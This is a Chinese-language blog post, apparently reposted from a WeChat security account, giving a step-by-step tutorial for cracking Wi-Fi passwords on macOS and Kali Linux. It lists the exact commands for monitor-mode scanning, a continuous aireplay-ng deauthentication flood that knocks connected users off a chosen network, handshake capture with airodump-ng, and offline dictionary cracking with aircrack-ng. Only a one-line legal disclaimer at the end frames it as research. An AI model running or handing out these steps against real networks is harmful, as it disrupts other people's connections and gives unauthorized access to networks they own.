MAC&KALI进行WiFi破解

  • A+
所属分类:安全文章

大致原理

通过发送断开连接的请求,使得所有连接了目标WI-FI的设备全都断开连接,设备会重新连接,然后监听其中一个设备与WI-FI建立连接时的握手包,其中包含了密码的密闻,然后使用aircrack-ng进行离线破解。

扫描附近SSID

此类工具有很多,例如MAC下的airport、kali自带的airodump-ng等

MAC下airport

执行命令获取附近SSIDsudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s设置快捷键后变成:airport -s

MAC&KALI进行WiFi破解

Kali下airodump-ng

注:
(1)这个特殊一点需要进行一些设置
(2)要有外置的 支持 kali 的 usb 无线网卡,虚拟机要把vmware的usb服务和网卡启用。

查看网卡信息

看下当前外接的网卡名字:

sudo airmon-ng或者ifconfig 

注:网卡推荐使用RTL8187 因为平常我们用的很多网卡Kali是不支持的,而支持的网卡里面,这款是性价比比较高的。

MAC&KALI进行WiFi破解

开启监听模式

MAC&KALI进行WiFi破解

开启监听后,此时网卡名字为wlan0mon

扫描SSID

MAC&KALI进行WiFi破解

抓握手包

然后选择一个你要破解的WI-FI,记录下它的BSSID(物理地址)、CH(CHANNEL)- 信道

MAC

注:需要先安装aircrack-ng

brew install aircrack-ng
开始监听airport en0 sniff 信道

此时WIFI的图标会变成一个黑点:

MAC&KALI进行WiFi破解

这个时候终端不会有其他提示:

MAC&KALI进行WiFi破解

等待一段时间后(尽量多等几分钟,等的越久抓到包的概率越大),CTRL+C结束
然后会提示抓的包存放位置:

MAC&KALI进行WiFi破解

接下来需要确认这个包里是否抓到里握手包(是否包含密码信息):

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap

注:因为同一个信道可能并不止一个WI-FI信号在使用,所以会探测多个WI-FI
如下图,"0handshake"说明没有抓到握手包,这里因为是演示过程,所以没有抓太久。

MAC&KALI进行WiFi破解

Kali

sudo airodump-ng -c 信道 --bssid 物理地址 -w ~/ wlan0mon

STATION就是当前正在与WI-FI通信的设备:

MAC&KALI进行WiFi破解

然后另外开启一个终端,发送deauth包:

sudo aireplay-ng -0 0 -a WIFI物理地址 -c 用户设备物理地址 wlan0mon参数 -0 3 表示发送3次,-0 0 表示持续发送。

MAC&KALI进行WiFi破解

可以看到被攻击的设备Lost和Frames的次数不断增加:

MAC&KALI进行WiFi破解

当抓到握手包后,提示如下:

MAC&KALI进行WiFi破解

此时就可以CTRL+C停止探测和发包的操作里。
此时会在当前目录下生成一个.cap的包:

MAC&KALI进行WiFi破解

注:默认生成的包名有个“-”后面执行破解的时候会被误认为参数的一部分从而报错,所以先改下名字,例如7.cap

破解握手包密码

MAC

sudo aircrack-ng /tmp/airportSniffnP4T3X.cap -w 字典路径

根据提示输入要破解的WI-FI的序号即可,因为这里我没抓到握手包,所以会提示缺少EAPOL data。

MAC&KALI进行WiFi破解

Kali

sudo aircrack-ng /tmp/airportSniffnP4T3X.cap -w 字典路径

然后就开始破解里,当然这里除了需要运气好,还需要对目标足够的了解,能够提前根据目标特点构造字典。

MAC&KALI进行WiFi破解

爆破成功后自带结束并显示密码:

MAC&KALI进行WiFi破解

因为一般情况下受限于字典,所以会跑一些很大的字典,例如几个G大小的字典,这个就需要较快处理性能的机器,例如可以用台式机来跑。


------------------------------------------------------------------------------


欢迎分享转发。

喜欢的话动动手指点个“关注”和“在看”吧~MAC&KALI进行WiFi破解

MAC&KALI进行WiFi破解

(信安随笔)


------------------------------------------------------------------------------

免责声明

本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。

本文始发于微信公众号(信安随笔):MAC&KALI进行WiFi破解

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: